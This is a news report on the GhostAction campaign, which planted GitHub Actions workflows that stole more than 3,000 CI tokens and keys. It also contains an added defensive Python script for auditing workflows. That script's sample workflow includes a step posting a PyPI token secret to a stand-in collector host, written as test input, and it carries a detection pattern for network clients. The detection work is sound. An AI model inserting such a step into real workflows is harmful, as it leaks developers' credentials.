Hacker Attack on GitHub steals more than 3,000 access keys and credentials
Published on September 10, 2025
A new cybercriminal campaign is affecting GitHub, resulting in the theft of over 3,300 access keys and credentials such as tokens and API keys. Called GhostAction, the campaign was discovered by security company GitGuardian, with the first signs emerging on September 2 this year in the FastUUID project.
According to experts, the attack exploits users' trust in the GitHub ecosystem, affecting the supply chain of projects hosted on the platform. The attackers' first step is to compromise a developer's account and then discreetly insert malicious files into the project's GitHub Actions workflows.
The file is triggered automatically whenever the project code is updated, causing malicious code to read the secrets stored in the project environment. This includes PyPI and npm tokens, Cloudflare keys, and AWS and database credentials; the stolen information is sent to an external server controlled by the cybercriminals.
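An added example, not from GitGuardian or the original article: a heuristic Python audit that flags workflow steps which both reference a `secrets.*` value and call an outbound HTTP client against a host outside an allowlist. The sample workflow, the host name and the function names are constructed for illustration.

```python
import re

# Constructed sample workflow (not taken from the campaign): a normal publish
# step, plus a step that hands a secret to an HTTP client.
SAMPLE_WORKFLOW = """\
name: ci
on: push
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: publish
        env:
          PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
        run: twine upload dist/*
      - name: sync
        run: |
          curl -s -X POST -d "t=${{ secrets.PYPI_TOKEN }}" https://collector.example.invalid/
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
NET_CLIENT = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")

def split_steps(text):
    """Return (first_line_number, block_text) for each YAML list item."""
    blocks, current, start = [], [], 0
    for no, line in enumerate(text.splitlines(), 1):
        if re.match(r"\s*- ", line):          # a new list item begins
            if current:
                blocks.append((start, "\n".join(current)))
            current, start = [line], no
        elif current:
            current.append(line)
    if current:
        blocks.append((start, "\n".join(current)))
    return blocks

def audit_workflow(text, allowed_hosts=frozenset()):
    """Flag steps that pair a secret reference with an outbound HTTP call."""
    findings = []
    for line_no, block in split_steps(text):
        secrets = sorted(set(SECRET_REF.findall(block)))
        if not secrets or not NET_CLIENT.search(block):
            continue
        urls = set(URL_HOST.findall(block))
        unknown = sorted(urls - set(allowed_hosts))
        if unknown or not urls:               # no literal URL is also suspect
            findings.append({"line": line_no, "secrets": secrets, "hosts": unknown})
    return findings
```

This is a line-based heuristic rather than a YAML parser, so treat a hit as a prompt to review the commit that introduced the step, not as proof of compromise.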
Attacks compromised more than 800 repositories
Since the discovery of the campaign, the researchers have found that GhostAction is larger than first believed, with malicious commits seen in at least 817 repositories, compromising up to 3,325 keys in 9 npm packages and 15 PyPI packages. Entire corporate SDK portfolios were affected, in some cases compromising Python, Rust, JavaScript and Go repositories.
The full scale of the attack became clear last Friday (5), when GitGuardian notified the security teams of GitHub, npm and PyPI, and also alerted 573 of the affected repositories on the platform. Approximately 100 of them had already detected the intrusion and reverted the malicious changes. The attackers' server that received the data has been inaccessible since then.
The attack is similar to the recent s1ngularity attack, which also affected GitHub, but experts do not believe there is a connection between the two campaigns. The recommendation for affected users is to revoke all compromised tokens and keys as soon as possible, preventing the attackers from publishing versions of their software with malware inserted.
Source: GitGuardian